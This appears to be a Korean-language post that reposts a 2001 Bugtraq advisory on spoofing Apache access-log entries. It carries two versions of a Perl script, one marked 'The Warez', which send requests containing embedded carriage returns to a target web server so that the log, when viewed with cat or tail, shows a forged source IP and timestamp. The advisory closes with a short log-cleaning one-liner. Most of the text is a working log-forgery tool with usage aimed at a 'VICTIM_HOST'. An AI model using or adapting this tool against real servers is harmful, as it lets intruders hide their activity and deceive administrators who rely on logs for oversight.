아파치 로그 정보 속이기

아래의 코드를 적당한 파일로 생성하여 (이를테면 fake.cgi)

./fake.cgi target.co.kr 80 /index.html 1.1.1.1

와 같이 실행하면 해당 웹서버의 index.html 을 읽으면서 target.co.kr 의 웹

서버에 남는

로그정보는 아래와 같게 됩니다.

1.1.1.1 – –  “GET / HTTP/1.0” 200 1333 +0900] “GET //index.html HTTP/1.0”

즉, 소스가 1.1.1.1이 아닌 다른 곳에서 target.co.kr 서버의 80 번으로

접속시도를 했는데,

소스IP 는 fake 된 1.1.1.1 이 되는 것입니다..

정상적인 로그 정보는

211.xx.xx.xxx – – [25/Oct/2001:20:26:17 +0900] “GET //index.html HTTP/1.0”

와 같아야 합니다…

위의 실험으로 보아 웹서버의 로그 정보도 충분히 속일 수 있다는 것을 알 수

있습니다.

IIS에서는 적용이 되지 않더군요….

원문은 아래 사이트를 참고하시기 바랍니다.

http://www.securityfocus.com/archive/1/222666

그럼…..

참고로, 아래 소스에서는 원본 소스의 get_time(); 부분을 뺐습니다.

#!/usr/bin/perl

use Socket;

use strict;

my $data_sacada;

######get the values

my $host = $ARGV[0];

my $port = $ARGV[1];

my $target = inet_aton($host);

my $file_to_get= $ARGV[2];

my $fake_ip = $ARGV[3];

######prepare request

my $envia=”GET /$file_to_get HTTP/1.0 \\r$fake_ip – – $data_sacada \\”GET /

HTTP/1.0\\r\\n\\r\\n”;

my @resultados=sendraw($envia);

print  @resultados;

sub sendraw {   # this saves the whole transaction anyway

        my %args;

        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp’)||0) ||

                die(“Socket problems\\n”);

        if(connect(S,pack “SnA4x8”,2,$port,$target)){

                my @in;

                select(S);      $|=1;   print $pstr;

                while(<S>){ push @in, $_;

                        print STDOUT “.” if(defined $args{X});}

                select(STDOUT); close(S); return @in;

        } else { die(“Can’t connect…\\n”); }

}

————————————

보낸 사람 : “smiler” <smiler at vxd.org>  

받는 사람 : <bugtraq at securityfocus.com>,

<submissions at

packetstormsecurity.org>  

제목 :  Hidden requests to Apache  

보낸 날짜 :  Wed, 24 Oct 2001 21:09:59 +0100  

———-Intro———-

Hi all ! Thanx to war at genhex.org and zav at genhex.org for discussing this

issue and helping on getting ideas about this issue with their imagination

!! 🙂

Don큧 know if this has been brought before.

It큦 possible to “cheat” a Apache SysAdministrator and make him think that

his server didn큧 log a HTTP request or make him think that a request has

been made by another Ip address.

This “cheating” is only valid when the log is displayed on the screen using

common unix utils as cat, tail, grep, etc…

This will not work with the kind of sysadmin that edit the logs using vi or

even print them to read at night on bed eh eh 🙂

I am not sure if this can be considered as a bug or as a feature (?) but in

any case it will surely lead apache sysadmins into mistake !!

———-Technique———-

To make a request and to make it seem like it came from NO IP ADDRESS at

all, the request should be made as this :

GET / HTTP/1.0 \\r\\r\\n

In this case APACHE will print in the log file the carriage return

character. So when we try to tail the access_log file it will be shown in

the screen as :

” 414 3461.251 – – [24/Oct/2001:18:58:18 +0100] “GET / HTTP/1.0

A normal line would be :

127.0.0.1 – – [24/Oct/2001:19:00:32 +0100] “GET / HTTP/1.0” 200 164

The normal line output will help us to understand that what happens is cat

made a carriage return after the HTTP/1.0 and printed the rest of the log

over the Ip Address field.

We can also make it look like the request came from another Ip address, and

this is preferable because like this the SysAdmin will see no apparent

strange behaviour in the logfile. Just be carefull with the timestamp !!

So the request should be :

GET / HTTP/1.0 \\r10.0.0.1 – – [24/Oct/2001:19:00:32 +0100] “GET /

HTTP/1.0\\r\\n

And the logfile will appear like this :

10.0.0.1 – – [24/Oct/2001:19:00:32 +0100] “GET / HTTP/1.0” 200 164

This is a perfect log entry and nobody can suspect on it 🙂

———-The Warez———-

#!/usr/bin/perl

#

# smiler at vxd.org war at genhex.org zav at genhex.org

# \\x18/\\xa/\\x07d1 ++351 Rulez

#

# This script will make a “hidden” request to a Apache Server when the log

file is viewed using cat grep tail …

# The script sends a carriage return character after the HTTP/1.0 and then

it makes a fake entry with the IP supplied in argv

# and it inserts a time-stamp similar to the one that server is using

currently, we get this by making a get request to the

# server before our special *g* GET, though we can큧 control the time

zone

of the server. So the time-zone may

# vary. Tested in ALL apache versions.

###############################################################

#############

#######################################################

# Thoughts : It would be better to send escape characters with move_forward

codes after the \\r and move over the real

# server큦 time stamp !! Anyone ? How do log analyzers deal with this stuff

? Anyone ?

###############################################################

#############

#######################################################

use Socket;

use strict;

my $data_sacada;

######check argv

if ($#ARGV != 3) {

print qq~

Geee it큦 running !! kewl :)))

Usage : ./apache_log.pl <VICTIM_HOST> <PORT> <FILE_TO_GET> <FAKE_IP>

Example Usage : apache_log.pl victimsite.victimsite.biz 80 /index.html

255.255.255.255

~; exit;}

######get the values

my $host = $ARGV[0];

my $port = $ARGV[1];

my $target = inet_aton($host);

my $file_to_get= $ARGV[2];

my $fake_ip = $ARGV[3];

get_time();

######prepare request

my $envia=”GET /$file_to_get HTTP/1.0 \\r$fake_ip – – $data_sacada \\”GET /

HTTP/1.0\\r\\n\\r\\n”;

my @resultados=sendraw($envia);

print  @resultados;

###### Sendraw – thanks RFP rfp at wiretrip.net ######

sub sendraw {   # this saves the whole transaction anyway

        my %args;

        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp’)||0) ||

                die(“Socket problems\\n”);

        if(connect(S,pack “SnA4x8”,2,$port,$target)){

                my @in;

                select(S);      $|=1;   print $pstr;

                while(<S>){ push @in, $_;

                        print STDOUT “.” if(defined $args{X});}

                select(STDOUT); close(S); return @in;

        } else { die(“Can’t connect…\\n”); }

}

###### Get the server time b4 sending the hidden request ######

sub get_time    {

        my $req=”GET / HTTP/1.0\\n\\n”;

        my $data;

        my @res=sendraw($req);

        my $wday;

        my $day;

        my $mon;

        my $year;

        my $hour;

        my $tz;

        my $line;

        foreach $line (@res)    {

                if ($line =~ /Date/)    {

                $data = $line;

                $data =~ s/Date: //g;

                ($wday,$day,$mon,$year,$hour,$tz)=split(/ /,$data);

                $data_sacada=”[“.$day.”/”.$mon.”/”.$year.”:”.$hour.”

+0000]”;

                }

        }

}

———-Solution———-

Use ‘vi’ to check your logs or cat your log using :

perl -e ‘open(FH,”access_log”);while(<FH>){$_=~s/[\\r|\\b|\\x27]//g;print $_}’